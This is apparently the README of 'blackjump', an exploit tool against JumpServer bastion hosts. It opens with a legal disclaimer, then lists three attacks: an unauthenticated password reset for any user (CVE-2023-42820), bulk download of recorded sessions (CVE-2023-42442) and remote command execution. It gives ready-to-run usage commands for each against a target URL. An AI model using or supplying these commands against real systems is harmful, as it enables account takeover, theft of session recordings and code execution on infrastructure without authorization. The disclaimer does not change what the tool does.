Legal Disclaimer: This tool is only intended for legally authorized enterprise security construction activities.
When using this tool for testing, you should ensure that the behavior complies with local laws and regulations and has obtained sufficient authorization. Do not use against unauthorized targets.
If you engage in any illegal behavior during the use of this tool, you shall bear the corresponding consequences on your own, and we will not assume any legal or joint liability
JumpServer Fortress Machine Integrated Vulnerability Exploit Tool
- Unauthorized password reset for any user (CVE-2023-42820)
- Unauthorized download of all operation videos (CVE-2023-42442)
- Unauthorized Remote Command Execution (RCE 2021)
python3 -m pip install -r requirements.txt- CVE-2023-42820: You can specify
--userand--emailoption if you know the username and email in reset password module
python3 blackjump.py reset https://vulerability
- CVE-2023-42442: The
<uuid4>.tarfile in theoutputs/directory can be thrown into the jumpserver player
python3 blackjump.py dump https://vulerability
- RCE
python3 blackjump.py rce http(s)://vulerability
- help
python3 blackjump.py {reset,dump,rce} -h- https://github.com/Veraxy00/Jumpserver-EXP (Made some optimizations)